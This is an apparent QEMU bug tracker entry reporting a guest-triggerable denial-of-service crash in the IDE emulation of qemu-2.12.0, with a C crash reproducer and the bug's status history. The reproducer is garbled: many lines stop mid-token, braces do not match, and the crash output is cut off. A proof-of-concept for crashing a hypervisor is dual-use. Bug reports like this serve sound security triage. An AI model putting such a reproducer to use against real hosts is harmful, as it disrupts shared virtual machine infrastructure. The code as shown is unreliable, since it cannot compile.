IDE short PRDT abort
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
QEMU | Expired | Undecided | Unassigned |
Bug Description
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
```c
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_
{
if (a0 == 0xc || a0 == 0xb) {
} else {
strncpy(buf, (char*)a0, sizeof(buf) - 1);
}
}
}
uint64_t r[2] = {0xffffffffffff
void loop()
{
long res = 0;
memcpy(
res = syz_open_
if (res != -1)
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
*(uint8_
*(uint8_
*(uint8_
*(uint8_
*(uint32_
*(uint8_
*(uint8_
*(uint8_
*(uint8_
memcpy(
}
int main()
{
loop();
return 0;
}
```
This will crash QEMU; output information:
qemu-system-
Thanks
owl337
Changed in qemu:
assignee: nobody → icytxw (icytxw)
information type: Public → Private
information type: Private → Private Security
information type: Private Security → Public Security
Changed in qemu:
assignee: nobody → John Snow (jnsnow)
status: New → In Progress
summary: Denial of service → IDE short PRDT abort
Are you going to provide a patch for this to the mailing list? (since you've assigned the bug to yourself)